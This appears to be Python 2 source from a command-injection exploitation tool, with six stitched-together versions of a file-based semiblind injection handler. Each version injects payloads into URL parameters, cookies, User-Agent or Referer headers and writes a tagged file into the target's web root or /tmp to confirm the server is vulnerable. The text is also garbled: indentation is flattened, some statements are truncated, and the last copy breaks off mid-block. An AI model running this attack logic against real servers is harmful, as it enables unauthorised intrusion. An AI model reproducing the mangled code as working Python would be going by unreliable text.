def fb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 failed_tries = 20 vp_flag = True exit_loops = False no_result = True is_encoded = False stop_injection = False call_tmp_based = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" # Set temp path if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH print "(*) Testing the " + technique + "... " if menu.options.file_dest: if '/tmp/' in menu.options.file_dest: call_tmp_based = True SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0] else: if menu.options.srv_root_dir: SRV_ROOT_DIR = menu.options.srv_root_dir else: SRV_ROOT_DIR = settings.SRV_ROOT_DIR i = 0 # Calculate all possible combinations total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len( settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Change TAG on every request to prevent false-positive results. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell: payload = fb_payloads.decision_alter_shell( separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Check if defined "--verbose" option. if menu.options.verbose: print Fore.GREY + "(~) Payload: " + payload.replace( "\n", "\\n") + Style.RESET_ALL # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter( menu.options.cookie) response = fb_injector.cookie_injection_test( url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter( menu.options.agent) response = fb_injector.user_agent_injection_test( url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter( menu.options.referer) response = fb_injector.referer_injection_test( url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test( payload, http_request_method, url) # Find the directory. path = url path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] output = url.replace(last_param, OUTPUT_TEXTFILE) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL sys.stdout.write("\r(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' on " + SRV_ROOT_DIR + "... [ " + percent + " ]") sys.stdout.flush() except urllib2.HTTPError, e: if e.getcode() == 404: percent = ((i * 100) / total) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split( menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, after 20 failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == failed_tries: if not menu.options.verbose: print "" print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on " + SRV_ROOT_DIR + "." + Style.RESET_ALL while True: tmp_upload = raw_input( "(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower() if tmp_upload in settings.CHOISE_YES: exit_loops = True tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) if no_result == True: return False elif tmp_upload in settings.CHOISE_NO: break else: if tmp_upload == "": tmp_upload = "enter" print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL pass continue else: if exit_loops == False: if not menu.options.verbose: if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(percent) + "%" else: percent = str(percent) + "%" sys.stdout.write( "\r(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' on " + SRV_ROOT_DIR + "... [ " + percent + " ]") sys.stdout.flush() continue else: continue else: raise elif e.getcode() == 401: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) except KeyboardInterrupt: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) raise except urllib2.URLError, e: #print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL sys.exit(0) except: continue
def fb_injection_handler(url,delay,filename,http_request_method): counter = 0 vp_flag = True no_result = True is_encoded= False stop_injection = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" print colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # Check if defined "--base64" option. if menu.options.base64_trick == True: B64_ENC_TAG = base64.b64encode(TAG) B64_DEC_TRICK = settings.B64_DEC_TRICK else: B64_ENC_TAG = TAG B64_DEC_TRICK = "" # The output file for file-based injection technique. OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt" if menu.options.srv_root_dir: SRV_ROOT_DIR = menu.options.srv_root_dir else: SRV_ROOT_DIR = settings.SRV_ROOT_DIR sys.stdout.write("(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... ") sys.stdout.flush() # Print the findings to log file. output_file = open(filename + ".txt", "a") output_file.write("\n---") output_file.write("\n(+) Type : " + injection_type) output_file.write("\n(+) Technique : " + technique.title()) output_file.close() for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). payload = fb_payloads.decision(separator,B64_ENC_TAG,B64_DEC_TRICK,OUTPUT_TEXTFILE) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix #Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) # Check if target host is vulnerable. response,vuln_parameter = fb_injector.injection_test(payload,http_request_method,url) # Find the directory. path = url path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] output = url.replace(last_param,OUTPUT_TEXTFILE) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r""+TAG+"", html_data) except urllib2.HTTPError, e: if e.getcode() == 404 : continue elif e.getcode() == 401: print colors.BGRED + "(x) Error: Authorization required!" + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 403: print colors.BGRED + "(x) Error: You don't have permission to access this page." + colors.RESET + "\n" sys.exit(0) except KeyboardInterrupt: raise except urllib2.URLError, e: print "\n" + colors.BGRED + "(x) Error: " + e.reason + colors.RESET sys.exit(0) except : continue
def fb_injection_handler(url, delay, filename, http_request_method, url_time_response): counter = 1 failed_tries = 20 vp_flag = True exit_loops = False no_result = True is_encoded= False stop_injection = False call_tmp_based = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" # Set temp path if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH if menu.options.file_dest and '/tmp/' in menu.options.file_dest: call_tmp_based = True else: if menu.options.srv_root_dir: settings.SRV_ROOT_DIR = menu.options.srv_root_dir else: # Debian/Ubunt have been updated to use /var/www/html as default instead of /var/www. if "debian" or "ubuntu" in settings.SERVER_BANNER.lower(): try: check_version = re.findall(r"/(.*)\.", settings.SERVER_BANNER.lower()) if check_version[0] > "2.3": # Add "/html" to servers root directory settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR except IndexError: pass # Add "/html" to servers root directory elif "fedora" or "centos" in settings.SERVER_BANNER.lower(): settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + "/html" else: pass path = urlparse.urlparse(url).path path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] EXTRA_DIR = path.replace(last_param, "") settings.SRV_ROOT_DIR = settings.SRV_ROOT_DIR + EXTRA_DIR if not menu.options.verbose: print "(*) Trying to create a file on " + settings.SRV_ROOT_DIR + "... " else: print "(*) Testing the "+ technique + "... " i = 0 # Calculate all possible combinations total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if alter_shell : payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) if menu.options.base64: payload = base64.b64encode(payload) # Check if defined "--verbose" option. if menu.options.verbose: print "(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + settings.SRV_ROOT_DIR + "..." print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL # Cookie Injection if settings.COOKIE_INJECTION == True: # Check if target host is vulnerable to cookie injection. vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie) response = fb_injector.cookie_injection_test(url, vuln_parameter, payload) # User-Agent Injection elif settings.USER_AGENT_INJECTION == True: # Check if target host is vulnerable to user-agent injection. vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent) response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload) # Referer Injection elif settings.REFERER_INJECTION == True: # Check if target host is vulnerable to referer injection. vuln_parameter = parameters.specify_referer_parameter(menu.options.referer) response = fb_injector.referer_injection_test(url, vuln_parameter, payload) else: # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url) # Find the directory. output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]") sys.stdout.flush() except urllib2.HTTPError, e: if e.getcode() == 404: percent = ((i*100)/total) float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2)) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split(menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) raise # Show an error message, after 20 failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == failed_tries and no_result == True : if not menu.options.verbose: print "" print Fore.YELLOW + "(^) Warning: It seems that you don't have permissions to write on "+ settings.SRV_ROOT_DIR + "." + Style.RESET_ALL while True: tmp_upload = raw_input("(?) Do you want to try the temporary directory (" + tmp_path + ") [Y/n/q] > ").lower() if tmp_upload in settings.CHOISE_YES: exit_loops = True call_tfb = tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response) if call_tfb != False: return True else: if no_result == True: return False else: return True elif tmp_upload in settings.CHOISE_NO: break elif tmp_upload in settings.CHOISE_QUIT: print "" raise else: if tmp_upload == "": tmp_upload = "enter" print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL pass continue else: if exit_loops == False: if not menu.options.verbose: if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(float_percent)+"%" else: percent = str(float_percent)+"%" sys.stdout.write("\r(*) Testing the "+ technique + "... [ " + percent + " ]") sys.stdout.flush() continue else: continue else: raise elif e.getcode() == 401: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) except KeyboardInterrupt: # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) raise except urllib2.URLError, e: # print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL # Delete previous shell (text) files (output) delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename) sys.exit(0) except: raise
def fb_injection_handler(url, delay, filename, http_request_method): counter = 0 vp_flag = True no_result = True is_encoded = False stop_injection = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" print colors.BOLD + "(*) Testing the " + technique + "... " + colors.RESET # Change TAG on every request to prevent false-positive resutls. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # Check if defined "--base64" option. if menu.options.base64_trick == True: B64_ENC_TAG = base64.b64encode(TAG) B64_DEC_TRICK = settings.B64_DEC_TRICK else: B64_ENC_TAG = TAG B64_DEC_TRICK = "" # The output file for file-based injection technique. OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt" if menu.options.srv_root_dir: SRV_ROOT_DIR = menu.options.srv_root_dir else: SRV_ROOT_DIR = settings.SRV_ROOT_DIR sys.stdout.write("(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' on " + SRV_ROOT_DIR + "... ") sys.stdout.flush() # Print the findings to log file. output_file = open(filename + ".txt", "a") output_file.write("\n---") output_file.write("\n(+) Type : " + injection_type) output_file.write("\n(+) Technique : " + technique.title()) output_file.close() for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). payload = fb_payloads.decision(separator, B64_ENC_TAG, B64_DEC_TRICK, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix #Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test( payload, http_request_method, url) # Find the directory. path = url path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] output = url.replace(last_param, OUTPUT_TEXTFILE) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) except urllib2.HTTPError, e: if e.getcode() == 404: continue elif e.getcode() == 401: print colors.BGRED + "(x) Error: Authorization required!" + colors.RESET + "\n" sys.exit(0) elif e.getcode() == 403: print colors.BGRED + "(x) Error: You don't have permission to access this page." + colors.RESET + "\n" sys.exit(0) except KeyboardInterrupt: raise except urllib2.URLError, e: print "\n" + colors.BGRED + "(x) Error: " + e.reason + colors.RESET sys.exit(0) except: continue
def fb_injection_handler(url, delay, filename, http_request_method): counter = 0 vp_flag = True exit_loops = False no_result = True is_encoded= False stop_injection = False call_tmp_based = False export_injection_info = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH print "(*) Testing the "+ technique + "... " if menu.options.file_dest: if '/tmp/' in menu.options.file_dest: call_tmp_based = True SRV_ROOT_DIR = os.path.split(menu.options.file_dest)[0] else: if menu.options.srv_root_dir: SRV_ROOT_DIR = menu.options.srv_root_dir else: SRV_ROOT_DIR = settings.SRV_ROOT_DIR i = 0 # Calculate all possible combinations total = len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) # Check if defined alter shell alter_shell = menu.options.alter_shell for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: i = i + 1 # Change TAG on every request to prevent false-positive results. TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) # The output file for file-based injection technique. OUTPUT_TEXTFILE = TAG + ".txt" # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" try: # File-based decision payload (check if host is vulnerable). if not alter_shell : payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE) else: payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix # Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL) # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url) # Find the directory. path = url path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] output = url.replace(last_param, OUTPUT_TEXTFILE) time.sleep(delay) try: # Check if defined extra headers. request = urllib2.Request(output) headers.do_check(request) # Evaluate test results. output = urllib2.urlopen(request) html_data = shell = re.findall(r"" + TAG + "", html_data) if len(shell) != 0 and not menu.options.verbose: percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]") sys.stdout.flush() except urllib2.HTTPError, e: if e.getcode() == 404: percent = ((i*100)/total) if call_tmp_based == True: exit_loops = True tmp_path = os.path.split(menu.options.file_dest)[0] + "/" tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method) raise # Show an error message, after 20 failed tries. # Use the "/tmp/" directory for tempfile-based technique. elif i == 20 : print "\n" + Back.RED + "(x) Error: It seems that you don't have permissions to write on "+ SRV_ROOT_DIR + "." + Style.RESET_ALL while True: tmp_upload = raw_input("(*) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower() if tmp_upload in settings.CHOISE_YES: exit_loops = True tfb_controller(no_result, url, delay, tmp_path, filename, http_request_method) if no_result == True: return False elif tmp_upload in settings.CHOISE_NO: break else: if tmp_upload == "": tmp_upload = "enter" print Back.RED + "(x) Error: '" + tmp_upload + "' is not a valid answer." + Style.RESET_ALL pass continue else: if exit_loops == False: if not menu.options.verbose: if percent == 100: if no_result == True: percent = Fore.RED + "FAILED" + Style.RESET_ALL else: percent = str(percent)+"%" else: percent = str(percent)+"%" sys.stdout.write("\r(*) Trying to upload the '"+ OUTPUT_TEXTFILE +"' on " + SRV_ROOT_DIR + "... [ " + percent + " ]") sys.stdout.flush() continue else: continue else: raise elif e.getcode() == 401: print Back.RED + "(x) Error: Authorization required!" + Style.RESET_ALL + "\n" sys.exit(0) elif e.getcode() == 403: print Back.RED + "(x) Error: You don't have permission to access this page." + Style.RESET_ALL + "\n" sys.exit(0) except KeyboardInterrupt: delete_previous_shell(separator, payload, TAG, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell) raise except urllib2.URLError, e: #print "\n" + Back.RED + "(x) Error: " + str(e.reason) + Style.RESET_ALL sys.exit(0) except: continue
def fb_injection_handler(url, delay, filename, http_request_method): counter = 0 vp_flag = True no_result = True is_encoded = False stop_injection = False injection_type = "Semiblind-based Command Injection" technique = "file-based semiblind injection technique" sys.stdout.write(colors.BOLD + "(*) Testing the " + technique + "... " + colors.RESET) sys.stdout.flush() # Print the findings to log file. output_file = open(filename + ".txt", "a") output_file.write("\n---") output_file.write("\n(+) Type : " + injection_type) output_file.write("\n(+) Technique : " + technique.title()) output_file.close() for prefix in settings.PREFIXES: for suffix in settings.SUFFIXES: for separator in settings.SEPARATORS: # Check for bad combination of prefix and separator combination = prefix + separator if combination in settings.JUNK_COMBINATION: prefix = "" # Change TAG on every request to prevent false-positive resutls. TAG = ''.join( random.choice(string.ascii_uppercase) for i in range(6)) # Check if defined "--base64" option. if menu.options.base64_trick == True: B64_ENC_TAG = base64.b64encode(TAG) B64_DEC_TRICK = settings.B64_DEC_TRICK else: B64_ENC_TAG = TAG B64_DEC_TRICK = "" # The output file for file-based injection technique. OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt" sys.stdout.write("\n(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' on " + settings.SRV_ROOT_DIR + "... ") try: # File-based decision payload (check if host is vulnerable). payload = fb_payloads.decision(separator, B64_ENC_TAG, B64_DEC_TRICK, OUTPUT_TEXTFILE) # Check if defined "--prefix" option. if menu.options.prefix: prefix = menu.options.prefix payload = prefix + payload else: payload = prefix + payload # Check if defined "--suffix" option. if menu.options.suffix: suffix = menu.options.suffix payload = payload + suffix else: payload = payload + suffix #Check if defined "--verbose" option. if menu.options.verbose: sys.stdout.write("\n" + colors.GREY + payload + colors.RESET) # Check if target host is vulnerable. response, vuln_parameter = fb_injector.injection_test( payload, http_request_method, url) # Find the directory. path = url path_parts = path.split('/') count = 0 for part in path_parts: count = count + 1 count = count - 1 last_param = path_parts[count] output = url.replace(last_param, OUTPUT_TEXTFILE) time.sleep(delay) try: # Evaluate test results. output = urllib2.urlopen(output) html_data = shell = re.findall(r"" + TAG + "", html_data) # If temp-based technique failed, use the "/tmp/" directory for tempfile-based technique. except urllib2.HTTPError, e: if e.getcode() == 404: stop_injection = True if menu.options.tmp_path: tmp_path = menu.options.tmp_path else: tmp_path = settings.TMP_PATH print colors.BGRED + "\n(x) Error: Unable to upload the '" + OUTPUT_TEXTFILE + "' on '" + settings.SRV_ROOT_DIR + "'." + colors.RESET + "" sys.stdout.write("(*) Trying to upload the '" + OUTPUT_TEXTFILE + "' on temporary directory (" + tmp_path + ")...\n") tfb_handler.exploitation(url, delay, filename, tmp_path, http_request_method) sys.exit(0) except urllib2.URLError, e: print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET sys.exit(0) except: